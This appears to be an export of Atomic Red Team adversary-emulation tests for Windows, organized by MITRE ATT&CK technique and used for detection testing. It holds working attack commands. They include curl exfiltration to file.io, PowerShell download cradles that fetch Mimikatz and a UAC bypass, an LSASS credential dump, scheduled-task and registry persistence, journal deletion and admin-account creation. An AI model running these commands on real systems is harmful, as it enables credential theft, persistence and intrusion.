pktmon.exe stop
T1040 command_prompt elevated windows Windows Internal pktmon set filter
Network Sniffing
Select Desired ports for packet capture https://lolbas-project.github.io/lolbas/Binaries/Pktmon/
pktmon.exe filter add -p 445
T1047 command_prompt windows WMI Reconnaissance Users
Windows Management Instrumentation
An adversary might use WMI to list all local User Accounts. When the test completes , there should be local user accounts information displayed on the command line.
wmic useraccount get /ALL /format:csv
T1047 command_prompt windows WMI Reconnaissance Processes
Windows Management Instrumentation
An adversary might use WMI to list Processes running on the compromised host. When the test completes , there should be running processes listed on the command line.
wmic process get caption,executablepath,commandline /format:csv
T1047 command_prompt windows WMI Reconnaissance Software
Windows Management Instrumentation
An adversary might use WMI to list installed Software hotfix and patches. When the test completes, there should be a list of installed patches and when they were installed.
wmic qfe get description,installedOn /format:csv
T1047 command_prompt windows WMI Reconnaissance List Remote Services
Windows Management Instrumentation
An adversary might use WMI to check if a certain Remote Service is running on a remote device. When the test completes, a service information will be displayed on the screen if it exists. A common feedback message is that "No instance(s) Available" if the service queried is not running. A common error message is "Node - (provided IP or default) ERROR Description =The RPC server is unavailable" if the provided remote host is unreachable
wmic /node:"#{node}" service where (caption like "%#{service_search_string}%")
T1047 command_prompt windows WMI Execute Local Process
Windows Management Instrumentation
This test uses wmic.exe to execute a process on the local host. When the test completes , a new process will be started locally .A notepad application will be started when input is left on default.
wmic process call create #{process_to_execute}
T1047 command_prompt windows WMI Execute Remote Process
Windows Management Instrumentation
This test uses wmic.exe to execute a process on a remote host. Specify a valid value for remote IP using the node parameter. To clean up, provide the same node input as the one provided to run the test A common error message is "Node - (provided IP or default) ERROR Description =The RPC server is unavailable" if the default or provided IP is unreachable
wmic /user:#{user_name} /password:#{password} /node:"#{node}" process call create #{process_to_execute}
T1047 command_prompt windows Create a Process using WMI Query and an Encoded Command
Windows Management Instrumentation
Solarigate persistence is achieved via backdoors deployed via various techniques including using PowerShell with an EncodedCommand Powershell -nop -exec bypass -EncodedCommand <encoded command> Where the -EncodedCommand, once decoded, would resemble: Invoke-WMIMethod win32_process -name create -argumentlist ‘rundll32 c:\windows\idmu\common\ypprop.dll _XInitImageFuncPtrs’ -ComputerName WORKSTATION The EncodedCommand in this atomic is the following: Invoke-WmiMethod -Path win32_process -Name create -ArgumentList notepad.exe You should expect to see notepad.exe running after execution of this test. [Solarigate Analysis from Microsoft](https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/)
powershell -exec bypass -e SQBuAHYAbwBrAGUALQBXAG0AaQBNAGUAdABoAG8AZAAgAC0AUABhAHQAaAAgAHcAaQBuADMAMgBfAHAAcgBvAGMAZQBzAHMAIAAtAE4AYQBtAGUAIABjAHIAZQBhAHQAZQAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIABuAG8AdABlAHAAYQBkAC4AZQB4AGUA
T1047 command_prompt windows WMI Execute rundll32
Windows Management Instrumentation
This test uses wmic.exe to execute a DLL function using rundll32. Specify a valid value for remote IP using the node parameter.
wmic /node:#{node} process call create "rundll32.exe \"#{dll_to_execute}\" #{function_to_execute}"
T1047 command_prompt elevated windows Application uninstall using WMIC
Windows Management Instrumentation
Emulates uninstalling applications using WMIC. This method only works if the product was installed with an msi file. APTs have been seen using this to uninstall security products.
wmic /node:"#{node}" product where "name like '#{product}%%'" call uninstall
T1048.002 command_prompt windows Exfiltrate data HTTPS using curl windows
Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
Exfiltrate data HTTPS using curl to file share site file.io
#{curl_path} -k -F "file=@#{input_file}" https://file.io/
T1049 command_prompt windows System Network Connections Discovery
System Network Connections Discovery
Get a listing of network connections. Upon successful execution, cmd.exe will execute netstat, net use and net sessions. net sessions requires elevated privileges; on standard user accounts this command may not return results. Results will output via stdout.
netstat -ano
net use
net sessions 2>nul
T1053.002 command_prompt windows At.exe Scheduled task
At
Executes cmd.exe Note: deprecated in Windows 8+ Upon successful execution, cmd.exe will spawn at.exe and create a scheduled task that will spawn cmd at a specific time.
at 13:20 /interactive cmd
T1053.005 command_prompt elevated windows Scheduled Task Startup Script
Scheduled Task
Run an exe on user logon or system startup. Upon execution, success messages will be displayed for the two scheduled tasks. To view the tasks, open the Task Scheduler and look in the Active Tasks pane.
schtasks /create /tn "T1053_005_OnLogon" /sc onlogon /tr "cmd.exe /c calc.exe"
schtasks /create /tn "T1053_005_OnStartup" /sc onstart /ru system /tr "cmd.exe /c calc.exe"
T1053.005 command_prompt windows Scheduled task Local
Scheduled Task
Upon successful execution, cmd.exe will create a scheduled task to spawn cmd.exe at 20:10.
SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time}
T1053.005 command_prompt elevated windows Scheduled task Remote
Scheduled Task
Create a task on a remote system. Upon successful execution, cmd.exe will create a scheduled task to spawn cmd.exe at 20:10 on a remote endpoint.
SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task" /TR "#{task_command}" /SC daily /ST #{time}
T1053.005 command_prompt windows Scheduled Task Executing Base64 Encoded Commands From Registry
Scheduled Task
A Base64 Encoded command will be stored in the registry (ping 127.0.0.1) and then a scheduled task will be created. The scheduled task will launch powershell to decode and run the command in the registry daily. This is a persistence mechanism recently seen in use by Qakbot. [Additiona Information](https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/)
reg add HKCU\SOFTWARE\ATOMIC-T1053.005 /v test /t REG_SZ /d cGluZyAxMjcuMC4wLjE= /f
schtasks.exe /Create /F /TN "ATOMIC-T1053.005" /TR "cmd /c start /min \"\" powershell.exe -Command IEX([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String((Get-ItemProperty -Path HKCU:\\SOFTWARE\\ATOMIC-T1053.005).test)))" /sc daily /st #{time}
T1053.005 command_prompt elevated windows Scheduled Task ("Ghost Task") via Registry Key Manipulation
Scheduled Task
Create a scheduled task through manipulation of registry keys. This procedure is implemented using the [GhostTask](https://github.com/netero1010/GhostTask) utility. By manipulating registry keys under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree, the tool creates user-specified scheduled tasks without a corresponding Windows Event 4698, which is logged when scheduled tasks are created through conventional means. This requires a download of the GhostTask binary, which must be run as NT Authority\SYSTEM. Upon successful execution of this test, a scheduled task will be set to run at logon which launches notepad.exe or runs a user-specified command. For further exploration of this procedure and guidance for hunting and detection, see [Hunting G-G-G-GhostTasks!](https://medium.com/p/154b50ab6a78).
"PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe" \\#{target} -accepteula -s "cmd.exe"
"PathToAtomicsFolder\..\ExternalPayloads\GhostTask.exe" \\#{target} add #{task_name} "cmd.exe" "/c #{task_command}" #{user_name} logon
T1053.005 command_prompt elevated windows Scheduled Task Persistence via CompMgmt.msc
Scheduled Task
Adds persistence by abusing compmgmt.msc via a scheduled task. When the Computer Management console is opened, it will run a malicious payload (in this case, calc.exe). This technique abuses scheduled tasks and registry modifications to hijack legitimate system processes.
reg add "HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command" /ve /t REG_EXPAND_SZ /d "c:\windows\System32\#{payload}" /f
schtasks /Create /TN "#{task_name}" /TR "compmgmt.msc" /SC ONLOGON /RL HIGHEST /F
ECHO Let's open the Computer Management console now...
compmgmt.msc
T1053.005 command_prompt elevated windows Scheduled Task Persistence via Eventviewer.msc
Scheduled Task
Adds persistence by abusing eventviewer.msc via a scheduled task. When the eventviewer console is opened, it will run a malicious payload (in this case, calc.exe).
reg add "HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command" /ve /t REG_EXPAND_SZ /d "c:\windows\System32\#{payload}" /f
schtasks /Create /TN "#{task_name}" /TR "eventvwr.msc" /SC ONLOGON /RL HIGHEST /F
ECHO Let's run the schedule task ...
schtasks /Run /TN "EventViewerBypass"
T1055 command_prompt windows Remote Process Injection in LSASS via mimikatz
Process Injection
Use mimikatz to remotely (via psexec) dump LSASS process content for RID 500 via code injection (new thread). Especially useful against domain controllers in Active Directory environments. It must be executed in the context of a user who is privileged on remote machine. The effect of /inject is explained in <https://blog.3or.de/mimikatz-deep-dive-on-lsadumplsa-patch-and-inject.html>
"#{psexec_path}" /accepteula \\#{machine} -c #{mimikatz_path} "lsadump::lsa /inject /id:500" "exit"
T1055.004 command_prompt windows Process Injection via C#
Asynchronous Procedure Call
Process Injection using C# reference: https://github.com/pwndizzle/c-sharp-memory-injection Excercises Five Techniques 1. Process injection 2. ApcInjectionAnyProcess 3. ApcInjectionNewProcess 4. IatInjection 5. ThreadHijack Upon successful execution, cmd.exe will execute T1055.exe, which exercises 5 techniques. Output will be via stdout.
"#{exe_binary}"
T1057 command_prompt windows Process Discovery - tasklist
Process Discovery
Utilize tasklist to identify processes. Upon successful execution, cmd.exe will execute tasklist.exe to list processes. Output will be via stdout.
tasklist
T1057 command_prompt windows Process Discovery - wmic process
Process Discovery
Utilize windows management instrumentation to identify processes. Upon successful execution, WMIC will execute process to list processes. Output will be via stdout.
wmic process get /format:list
T1057 command_prompt windows Discover Specific Process - tasklist
Process Discovery
Adversaries may use command line tools to discover specific processes in preparation of further attacks. Examples of this could be discovering the PID of lsass.exe to dump its memory or discovering whether specific security processes (e.g. AV or EDR) are running.
tasklist | findstr #{process_to_enumerate}
T1057 command_prompt windows Launch Taskmgr from cmd to View running processes
Process Discovery
An adverary may launch taskmgr.exe with the /7 switch via command prompt to view processes running on the system. [Reference](https://github.com/trellix-enterprise/ac3-threat-sightings/blob/main/sightings/Sightings_Conti_Ransomware.yml)
taskmgr.exe /7
T1059.001 command_prompt elevated windows Mimikatz
PowerShell
Download Mimikatz and dump credentials. Upon execution, mimikatz dump details and password hashes will be displayed.
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invoke-Mimikatz -DumpCreds"
T1059.001 command_prompt windows Invoke-AppPathBypass
PowerShell
Note: Windows 10 only. Upon execution windows backup and restore window will be opened. Bypass is based on: https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-paths/
Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/a0dfca7056ef20295b156b8207480dc2465f94c3/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass -Payload 'C:\Windows\System32\cmd.exe'"
T1059.001 command_prompt windows Powershell MsXml COM object - with prompt
PowerShell
Powershell MsXml COM object. Not proxy aware, removing cache although does not appear to write to those locations. Upon execution, "Download Cradle test success!" will be displayed. Provided by https://github.com/mgreen27/mgreen27.github.io
powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"
T1059.001 command_prompt windows Powershell XML requests
PowerShell
Powershell xml download request. Upon execution, "Download Cradle test success!" will be dispalyed. Provided by https://github.com/mgreen27/mgreen27.github.io
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('#{url}');$Xml.command.a.execute | IEX"
T1059.001 command_prompt windows Powershell invoke mshta.exe download
PowerShell
Powershell invoke mshta to download payload. Upon execution, a new PowerShell window will be opened which will display "Download Cradle test success!". Provided by https://github.com/mgreen27/mgreen27.github.io
C:\Windows\system32\cmd.exe /c "mshta.exe javascript:a=GetObject('script:#{url}').Exec();close()"
T1059.001 command_prompt windows PowerShell Command Execution
PowerShell
Use of obfuscated PowerShell to execute an arbitrary command; outputs "Hello, from PowerShell!". Example is from the 2021 Threat Detection Report by Red Canary.
powershell.exe -e  #{obfuscated_code}
T1059.003 command_prompt windows Writes text to a file and displays it.
Windows Command Shell
Writes text to a file and display the results. This test is intended to emulate the dropping of a malicious file to disk.
echo "#{message}" > "#{file_contents_path}" & type "#{file_contents_path}"
T1059.003 command_prompt windows Suspicious Execution via Windows Command Shell
Windows Command Shell
Command line executed via suspicious invocation. Example is from the 2021 Threat Detection Report by Red Canary.
%LOCALAPPDATA:~-3,1%md /c echo #{input_message} > #{output_file} & type #{output_file}
T1059.003 command_prompt windows Command Prompt read contents from CMD file and execute
Windows Command Shell
Simulate Raspberry Robin using the "standard-in" command prompt feature cmd /R < to read and execute a file via cmd.exe See https://redcanary.com/blog/raspberry-robin/.
cmd /r cmd<"#{input_file}"
T1059.003 command_prompt elevated windows Command prompt writing script to file then executes it
Windows Command Shell
Simulate DarkGate malware's second stage by writing a VBscript to disk directly from the command prompt then executing it. The script will execute 'whoami' then exit.
 c:\windows\system32\cmd.exe /c cd /d #{script_path} & echo Set objShell = CreateObject("WScript.Shell"):Set objExec = objShell.Exec("whoami"):Set objExec = Nothing:Set objShell = Nothing > #{script_name}.vbs & #{script_name}.vbs
T1059.007 command_prompt windows JScript execution to gather local computer information via cscript
JavaScript
JScript execution test, execute JScript via cscript command. When successful, system information will be written to $env:TEMP\T1059.007.out.txt
cscript "#{jscript}" > %tmp%\T1059.007.out.txt
T1059.007 command_prompt windows JScript execution to gather local computer information via wscript
JavaScript
JScript execution test, execute JScript via wscript command. When successful, system information will be shown with four message boxes.
wscript "#{jscript}"
T1069.001 command_prompt windows Basic Permission Groups Discovery Windows (Local)
Local Groups
Basic Permission Groups Discovery for Windows. This test will display some errors if run on a computer not connected to a domain. Upon execution, domain information will be displayed.
net localgroup
net localgroup "Administrators"
T1069.001 command_prompt windows Wmic Group Discovery
Local Groups
Utilizing wmic.exe to enumerate groups on the local system. Upon execution, information will be displayed of local groups on system.
wmic group get name
T1069.002 command_prompt windows Basic Permission Groups Discovery Windows (Domain)
Domain Groups
Basic Permission Groups Discovery for Windows. This test will display some errors if run on a computer not connected to a domain. Upon execution, domain information will be displayed.
net localgroup
net group /domain
net group "enterprise admins" /domain
net group "domain admins" /domain
T1069.002 command_prompt windows Elevated group enumeration using net group (Domain)
Domain Groups
Runs "net group" command including command aliases and loose typing to simulate enumeration/discovery of high value domain groups. This test will display some errors if run on a computer not connected to a domain. Upon execution, domain information will be displayed.
net groups "Account Operators" /domain
net groups "Exchange Organization Management" /domain
net group "BUILTIN\Backup Operators" /domain
net group "Domain Admins" /domain
T1069.002 command_prompt windows Adfind - Query Active Directory Groups
Domain Groups
Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Groups reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -f (objectcategory=group) #{optional_args}
T1069.002 command_prompt elevated windows Active Directory Enumeration with LDIFDE
Domain Groups
Output information from Active Directory to a specified file. [Ldifde](https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/cc731033(v=ws.11)) is a CLI tool for creating, modifying and deleting directory objects. The test is derived from the CISA Report on Voly Typhoon. Reference: https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF
ldifde.exe -f #{output_path}\#{output_file} -p subtree
T1070 command_prompt elevated windows Indicator Removal using FSUtil
Indicator Removal
Manages the update sequence number (USN) change journal, which provides a persistent log of all changes made to files on the volume. Upon execution, no output will be displayed. More information about fsutil can be found at https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/fsutil-usn
fsutil usn deletejournal /D C:
T1070.004 command_prompt windows Delete a single file - Windows cmd
File Deletion
Delete a single file from the temporary directory using cmd.exe. Upon execution, no output will be displayed. Use File Explorer to verify the file was deleted.
del /f #{file_to_delete}
T1070.004 command_prompt windows Delete an entire folder - Windows cmd
File Deletion
Recursively delete a folder in the temporary directory using cmd.exe. Upon execution, no output will be displayed. Use File Explorer to verify the folder was deleted.
rmdir /s /q #{folder_to_delete}
T1070.004 command_prompt elevated windows Clears Recycle bin via rd
File Deletion
An adversary clears the recycle bin in the system partition using rd to remove traces of deleted files. [Reference](https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/)
rd /s /q %systemdrive%\$RECYCLE.BIN
T1070.005 command_prompt windows Add Network Share
Network Share Connection Removal
Add a Network Share utilizing the command_prompt
net use c: #{share_name}
net share test=#{share_name} /REMARK:"test share" /CACHE:No
T1070.005 command_prompt windows Remove Network Share
Network Share Connection Removal
Removes a Network Share utilizing the command_prompt
net share #{share_name} /delete
T1070.005 command_prompt elevated windows Disable Administrative Share Creation at Startup
Network Share Connection Removal
Administrative shares are hidden network shares created by Microsoft’s Windows NT operating systems that grant system administrators remote access to every disk volume on a network-connected system. These shares are automatically created at started unless they have been purposefully disabled as is done in this Atomic test. As Microsoft puts it, "Missing administrative shares typically indicate that the computer in question has been compromised by malicious software." https://threatpost.com/conti-ransomware-gang-has-full-log4shell-attack-chain/177173/
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" /v AutoShareServer /t REG_DWORD /d 0 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" /v AutoShareWks /t REG_DWORD /d 0 /f
T1070.005 command_prompt elevated windows Remove Administrative Shares
Network Share Connection Removal
Administrative shares are hidden network shares created by Microsoft’s Windows NT operating systems that grant system administrators remote access to every disk volume on a network-connected system. As Microsoft puts it, “Missing administrative shares typically indicate that the computer in question has been compromised by malicious software. https://threatpost.com/conti-ransomware-gang-has-full-log4shell-attack-chain/177173/
for %i in (C$ IPC$ ADMIN$) do net share %i /delete
T1071.001 command_prompt windows Malicious User Agents - CMD
Web Protocols
This test simulates an infected host beaconing to command and control. Upon execution, no out put will be displayed. Use an application such as Wireshark to record the session and observe user agent strings and responses. Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/master/test-sets/command-and-control/malicious-user-agents.bat
#{curl_path} -s -A "HttpBrowser/1.0" -m3 #{domain} >nul 2>&1
#{curl_path} -s -A "Wget/1.9+cvs-stable (Red Hat modified)" -m3 #{domain} >nul 2>&1
#{curl_path} -s -A "Opera/8.81 (Windows NT 6.0; U; en)" -m3 #{domain} >nul 2>&1
#{curl_path} -s -A "*<|>*" -m3 #{domain} >nul 2>&1
T1072 command_prompt elevated windows Radmin Viewer Utility
Software Deployment Tools
An adversary may use Radmin Viewer Utility to remotely control Windows device, this will start the radmin console.
"%PROGRAMFILES(x86)%/#{radmin_exe}"
T1072 command_prompt elevated windows PDQ Deploy RAT
Software Deployment Tools
An adversary may use PDQ Deploy Software to deploy the Remote Adminstartion Tool, this will start the PDQ console.
"%PROGRAMFILES(x86)%/#{PDQ_Deploy_exe}"
T1078.001 command_prompt elevated windows Enable Guest account with RDP capability and admin privileges
Default Accounts
After execution the Default Guest account will be enabled (Active) and added to Administrators and Remote Desktop Users Group, and desktop will allow multiple RDP connections.
net user #{guest_user} /active:yes
net user #{guest_user} #{guest_password}
net localgroup #{local_admin_group} #{guest_user} /add
net localgroup "#{remote_desktop_users_group_name}" #{guest_user} /add
reg add "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
T1078.001 command_prompt elevated windows Activate Guest Account
Default Accounts
The Adversaries can activate the default Guest user. The guest account is inactivated by default
net user #{guest_user} /active:yes
T1078.003 command_prompt elevated windows Create local account with admin privileges
Local Accounts
After execution the new account will be active and added to the Administrators group
net user art-test /add
net user art-test #{password}
net localgroup administrators art-test /add
T1078.003 command_prompt elevated windows Use PsExec to elevate to NT Authority\SYSTEM account
Local Accounts
PsExec is a powerful tool most known for its remote management capability. However, it can also be used to run processes as the local system account. The local system account is a default windows account which has unrestricted access to all system resources. Upon successful execution, PsExec.exe will spawn a command prompt which will run 'whoami' as the local system account and then exit.
"PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe" -accepteula -s %COMSPEC% /c whoami
T1082 command_prompt windows System Information Discovery
System Information Discovery
Identify System Info. Upon execution, system info and time info will be displayed.
systeminfo
reg query HKLM\SYSTEM\CurrentControlSet\Services\Disk\Enum
T1082 command_prompt windows Hostname Discovery (Windows)
System Information Discovery
Identify system hostname for Windows. Upon execution, the hostname of the device will be displayed.
hostname
T1082 command_prompt windows Windows MachineGUID Discovery
System Information Discovery
Identify the Windows MachineGUID value for a system. Upon execution, the machine GUID will be displayed from registry.
REG QUERY HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography /v MachineGuid
T1082 command_prompt windows Environment variables discovery on windows
System Information Discovery
Identify all environment variables. Upon execution, environments variables and your path info will be displayed.
set
T1082 command_prompt windows System Information Discovery with WMIC
System Information Discovery
Identify system information with the WMI command-line (WMIC) utility. Upon execution, various system information will be displayed, including: OS, CPU, GPU, and disk drive names; memory capacity; display resolution; and baseboard, BIOS, and GPU driver products/versions. https://nwgat.ninja/getting-system-information-with-wmic-on-windows/ Elements of this test were observed in the wild used by Aurora Stealer in late 2022 and early 2023, as highlighted in public reporting: https://blog.sekoia.io/aurora-a-rising-stealer-flying-under-the-radar https://blog.cyble.com/2023/01/18/aurora-a-stealer-using-shapeshifting-tactics/
wmic cpu get name
wmic MEMPHYSICAL get MaxCapacity
wmic baseboard get product
wmic baseboard get version
wmic bios get SMBIOSBIOSVersion
wmic path win32_VideoController get name
wmic path win32_VideoController get DriverVersion
wmic path win32_VideoController get VideoModeDescription
wmic OS get Caption,OSArchitecture,Version
wmic DISKDRIVE get Caption
Get-WmiObject win32_bios
T1082 command_prompt elevated windows System Information Discovery
System Information Discovery
The script gathernetworkinfo.vbs is employed to collect system information such as the operating system, DNS details, firewall configuration, etc. Outputs are stored in c:\Windows\System32\config or c:\Windows\System32\reg. https://www.verboon.info/2011/06/the-gathernetworkinfo-vbs-script/
wscript.exe C:\Windows\System32\gatherNetworkInfo.vbs
T1082 command_prompt windows Check computer location
System Information Discovery
Looks up country code configured in the registry, likely geofence. Upon execution, country code info will be displayed. - https://tria.ge/210111-eaz8mqhgh6/behavioral1
reg query "HKEY_CURRENT_USER\Control Panel\International\Geo"
T1082 command_prompt windows BIOS Information Discovery through Registry
System Information Discovery
Looks up for BIOS information in the registry. BIOS information is often read in order to detect sandboxing environments. Upon execution, BIOS information will be displayed. - https://tria.ge/210111-eaz8mqhgh6/behavioral1 - https://evasions.checkpoint.com/techniques/registry.html
reg query HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System /v SystemBiosVersion
reg query HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System /v VideoBiosVersion
T1082 command_prompt windows ESXi - VM Discovery using ESXCLI
System Information Discovery
An adversary will using ESXCLI to enumerate the Virtual Machines on the host prior to executing power off routine. [Reference](https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/)
echo "" | "#{plink_file}" "#{vm_host}" -ssh  -l "#{vm_user}" -pw "#{vm_pass}" -m "#{cli_script}"
T1082 command_prompt windows ESXi - Darkside system information discovery
System Information Discovery
Darkside ransomware utilises various ESXCLI commands to obtain information about the ESXi Host. [Reference](https://www.trendmicro.com/en_ph/research/21/e/darkside-linux-vms-targeted.html)
echo "" | "#{plink_file}" "#{vm_host}" -ssh  -l "#{vm_user}" -pw "#{vm_pass}" -m "#{cli_script}"
T1082 command_prompt windows Check OS version via "ver" command
System Information Discovery
Ver command shows information about os version.
ver
T1082 command_prompt elevated windows Display volume shadow copies with "vssadmin"
System Information Discovery
The command shows all available volume shadow copies, along with their creation time and location.
vssadmin.exe list shadows
T1082 command_prompt windows Identify System Locale and Regional Settings with PowerShell
System Information Discovery
This action demonstrates how an attacker might gather a system's region and language settings using PowerShell, which could aid in profiling the machine's location and user language preferences. The command outputs system locale details to a temporary file for further analysis.
powershell.exe -c "Get-Culture | Format-List | Out-File -FilePath %TMP%\a.txt"
T1082 command_prompt windows Enumerate Available Drives via gdr
System Information Discovery
This test simulates an attacker attempting to list the available drives on the system to gather data about file storage locations.
powershell.exe -c "gdr -PSProvider 'FileSystem'"
T1082 command_prompt windows Discover OS Product Name via Registry
System Information Discovery
Identify the Operating System Product Name via registry with the reg.exe command. Upon execution, the OS Product Name will be displayed.
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v ProductName
T1082 command_prompt windows Discover OS Build Number via Registry
System Information Discovery
Identify the Operating System Build Number via registry with the reg.exe command. Upon execution, the OS Build Number will be displayed.
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v CurrentBuildNumber
T1083 command_prompt windows File and Directory Discovery (cmd.exe)
File and Directory Discovery
Find or discover files on the file system. Upon successful execution, this test will output the results of all the data discovery commands to a specified file.
dir /s c:\ >> #{output_file}
dir /s "c:\Documents and Settings" >> #{output_file}
dir /s "c:\Program Files\" >> #{output_file}
dir "%systemdrive%\Users\*.*" >> #{output_file}
dir "%userprofile%\AppData\Roaming\Microsoft\Windows\Recent\*.*" >> #{output_file}
dir "%userprofile%\Desktop\*.*" >> #{output_file}
tree /F >> #{output_file}
T1083 command_prompt windows ESXi - Enumerate VMDKs available on an ESXi Host
File and Directory Discovery
An adversary uses the find command to enumerate vmdks on an ESXi host. [Reference](https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/)
echo "" | "#{plink_file}" "#{vm_host}" -ssh  -l "#{vm_user}" -pw "#{vm_pass}" -m "#{cli_script}"
T1087.001 command_prompt windows Enumerate all accounts on Windows (Local)
Local Account
Enumerate all accounts Upon execution, multiple enumeration commands will be run and their output displayed in the PowerShell session
net user
dir c:\Users\
cmdkey.exe /list
net localgroup "Users"
net localgroup
T1087.001 command_prompt windows Enumerate logged on users via CMD (Local)
Local Account
Enumerate logged on users. Upon execution, logged on users will be displayed.
query user
T1087.001 command_prompt windows ESXi - Local Account Discovery via ESXCLI
Local Account
An adversary can use ESXCLI to enumerate a list of all local accounts on an ESXi host. [Reference](https://lolesxi-project.github.io/LOLESXi/lolesxi/Binaries/esxcli/#account%20enumeration)"
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "esxcli system account list"
T1087.002 command_prompt windows Enumerate all accounts (Domain)
Domain Account
Enumerate all accounts Upon exection, multiple enumeration commands will be run and their output displayed in the PowerShell session
net user /domain
net group /domain
T1087.002 command_prompt windows Enumerate logged on users via CMD (Domain)
Domain Account
Enumerate logged on users. Upon exeuction, logged on users will be displayed.
query user /SERVER:#{computer_name}
T1087.002 command_prompt windows Adfind -Listing password policy
Domain Account
Adfind tool can be used for reconnaissance in an Active directory environment. The example chosen illustrates adfind used to query the local password policy. reference- http://www.joeware.net/freetools/tools/adfind/, https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -default -s base lockoutduration lockoutthreshold lockoutobservationwindow maxpwdage minpwdage minpwdlength pwdhistorylength pwdproperties
T1087.002 command_prompt windows Adfind - Enumerate Active Directory Admins
Domain Account
Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Admin accounts reference- http://www.joeware.net/freetools/tools/adfind/, https://stealthbits.com/blog/fun-with-active-directorys-admincount-attribute/
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc admincountdmp #{optional_args}
T1087.002 command_prompt windows Adfind - Enumerate Active Directory User Objects
Domain Account
Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory User Objects reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -f (objectcategory=person) #{optional_args}
T1087.002 command_prompt windows Adfind - Enumerate Active Directory Exchange AD Objects
Domain Account
Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Exchange Objects reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc exchaddresses #{optional_args}
T1087.002 command_prompt windows Enumerate Default Domain Admin Details (Domain)
Domain Account
This test will enumerate the details of the built-in domain admin account
net user administrator /domain
T1098 command_prompt elevated windows Password Change on Directory Service Restore Mode (DSRM) Account
Account Manipulation
Change the password on the Directory Service Restore Mode (DSRM) account using ntdsutil by syncing to existing account
ntdsutil "set dsrm password" "sync from domain account #{sync_account}" "q" "q"
T1105 command_prompt windows certutil download (urlcache)
Ingress Tool Transfer
Use certutil -urlcache argument to download a file from the web. Note - /urlcache also works!
cmd /c certutil -urlcache -split -f #{remote_file} #{local_path}
T1105 command_prompt windows Windows - BITSAdmin BITS Download
Ingress Tool Transfer
This test uses BITSAdmin.exe to schedule a BITS job for the download of a file. This technique is used by Qbot malware to download payloads.
C:\Windows\System32\bitsadmin.exe /transfer #{bits_job_name} /Priority HIGH #{remote_file} #{local_path}
T1105 command_prompt elevated windows OSTAP Worming Activity
Ingress Tool Transfer
OSTap copies itself in a specfic way to shares and secondary drives. This emulates the activity.
pushd #{destination_path}
echo var fileObject = WScript.createobject("Scripting.FileSystemObject");var newfile = fileObject.CreateTextFile("AtomicTestFileT1105.js", true);newfile.WriteLine("This is an atomic red team test file for T1105. It simulates how OSTap worms accross network shares and drives.");newfile.Close(); > AtomicTestT1105.js
CScript.exe AtomicTestT1105.js //E:JScript
del AtomicTestT1105.js /Q >nul 2>&1
